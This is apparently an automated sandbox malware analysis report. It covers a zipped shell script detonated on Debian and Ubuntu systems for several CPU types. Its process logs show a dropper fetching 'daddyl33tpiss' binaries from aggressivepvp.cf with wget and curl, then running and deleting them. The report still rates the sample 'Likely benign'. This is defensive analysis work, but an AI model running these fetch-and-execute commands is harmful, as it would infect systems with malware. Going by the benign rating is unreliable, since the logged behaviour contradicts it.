Malware Analysis Report

2024-10-16 06:09

Sample ID 240715-x2s8ssxhrc
Target 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.zip
SHA256 072a6dc8a7e9fb53b59013d0f1acd7e0f400e5ef77f264a7d4f85be4fde125c7
Tags
antivm
score
4/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
4/10

SHA256

072a6dc8a7e9fb53b59013d0f1acd7e0f400e5ef77f264a7d4f85be4fde125c7

Threat Level: Likely benign

The file 69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.zip was found to be: Likely benign.

Malicious Activity Summary

antivm

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-15 19:21

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-15 19:21

Reported

2024-07-15 19:22

Platform

debian9-mipsel-20240418-en

Max time kernel

28s

Max time network

30s

Command Line

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/busybox /bin/cp N/A

Processes

/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

/bin/chmod

[chmod 777 daddyl33tpiss.i486]

/tmp/daddyl33tpiss.i486

[./daddyl33tpiss.i486 Retard.i486.wget]

/bin/rm

[rm -rf daddyl33tpiss.i486]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]

/bin/chmod

[chmod 777 daddyl33tpiss.x86_64]

/tmp/daddyl33tpiss.x86_64

[./daddyl33tpiss.x86_64 Retard.x86_64.wget]

/bin/rm

[rm -rf daddyl33tpiss.x86_64]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]

/bin/chmod

[chmod 777 daddyl33tpiss.i586]

/tmp/daddyl33tpiss.i586

[./daddyl33tpiss.i586 Retard.i586.wget]

/bin/rm

[rm -rf daddyl33tpiss.i586]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]

/bin/chmod

[chmod 777 daddyl33tpiss.i686]

/tmp/daddyl33tpiss.i686

[./daddyl33tpiss.i686 Retard.i686.wget]

/bin/rm

[rm -rf daddyl33tpiss.i686]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]

/bin/chmod

[chmod 777 daddyl33tpiss.mips]

/tmp/daddyl33tpiss.mips

[./daddyl33tpiss.mips Retard.mips.wget]

/bin/rm

[rm -rf daddyl33tpiss.mips]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel]

/bin/chmod

[chmod 777 daddyl33tpiss.mipsel]

/tmp/daddyl33tpiss.mipsel

[./daddyl33tpiss.mipsel Retard.mipsel.wget]

/bin/rm

[rm -rf daddyl33tpiss.mipsel]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm]

/bin/chmod

[chmod 777 daddyl33tpiss.arm]

/tmp/daddyl33tpiss.arm

[./daddyl33tpiss.arm Retard.arm.wget]

/bin/rm

[rm -rf daddyl33tpiss.arm]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm5]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.arm5]

Network

Country Destination Domain Proto
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp

Files

/tmp/busybox

MD5 6ffc46165b5d9726a6607f3ea5305589
SHA1 ab127220f42e816b413dde0d17031e251a7bc98f
SHA256 80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c
SHA512 456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-15 19:21

Reported

2024-07-15 19:21

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

10s

Max time network

13s

Command Line

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/filesystems /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/busybox /bin/cp N/A

Processes

/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp

Files

/tmp/busybox

MD5 b4dede5fc0b1bad5cb8e901bde126b97
SHA1 10cbe9a418ad84a1ed297948539d37aeb58dd810
SHA256 a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
SHA512 45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-15 19:21

Reported

2024-07-15 19:21

Platform

debian9-armhf-20240418-en

Max time kernel

18s

Max time network

3s

Command Line

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/busybox /bin/cp N/A

Processes

/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

Network

Country Destination Domain Proto
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp

Files

/tmp/busybox

MD5 e588bcf03ae78237b58899d35f50c570
SHA1 2194732ebbefbc27bdae876c77f2a97a20175710
SHA256 2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88
SHA512 904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-15 19:21

Reported

2024-07-15 19:22

Platform

debian9-mipsbe-20240611-en

Max time kernel

24s

Max time network

26s

Command Line

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

Signatures

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/busybox /bin/cp N/A

Processes

/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh

[/tmp/69f4dcd1de05fc553781e737e85bdae5f0e79e7f34ded1899d60630e54d43fe4.sh]

/bin/cp

[cp /bin/busybox /tmp/]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i486]

/bin/chmod

[chmod 777 daddyl33tpiss.i486]

/tmp/daddyl33tpiss.i486

[./daddyl33tpiss.i486 Retard.i486.wget]

/bin/rm

[rm -rf daddyl33tpiss.i486]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.x86_64]

/bin/chmod

[chmod 777 daddyl33tpiss.x86_64]

/tmp/daddyl33tpiss.x86_64

[./daddyl33tpiss.x86_64 Retard.x86_64.wget]

/bin/rm

[rm -rf daddyl33tpiss.x86_64]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i586]

/bin/chmod

[chmod 777 daddyl33tpiss.i586]

/tmp/daddyl33tpiss.i586

[./daddyl33tpiss.i586 Retard.i586.wget]

/bin/rm

[rm -rf daddyl33tpiss.i586]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.i686]

/bin/chmod

[chmod 777 daddyl33tpiss.i686]

/tmp/daddyl33tpiss.i686

[./daddyl33tpiss.i686 Retard.i686.wget]

/bin/rm

[rm -rf daddyl33tpiss.i686]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]

/usr/bin/curl

[curl -O http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mips]

/bin/chmod

[chmod 777 daddyl33tpiss.mips]

/tmp/daddyl33tpiss.mips

[./daddyl33tpiss.mips Retard.mips.wget]

/bin/rm

[rm -rf daddyl33tpiss.mips]

/usr/bin/wget

[wget http://aggressivepvp.cf/iwadyhsa/daddyl33tpiss.mipsel]

Network

Country Destination Domain Proto
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp
US 1.1.1.1:53 aggressivepvp.cf udp

Files

/tmp/busybox

MD5 a39fe8036e559ce804e26518061e59ff
SHA1 8df27f6e8a48b762d945ea2f2b87390c80acd4de
SHA256 3180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38
SHA512 e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d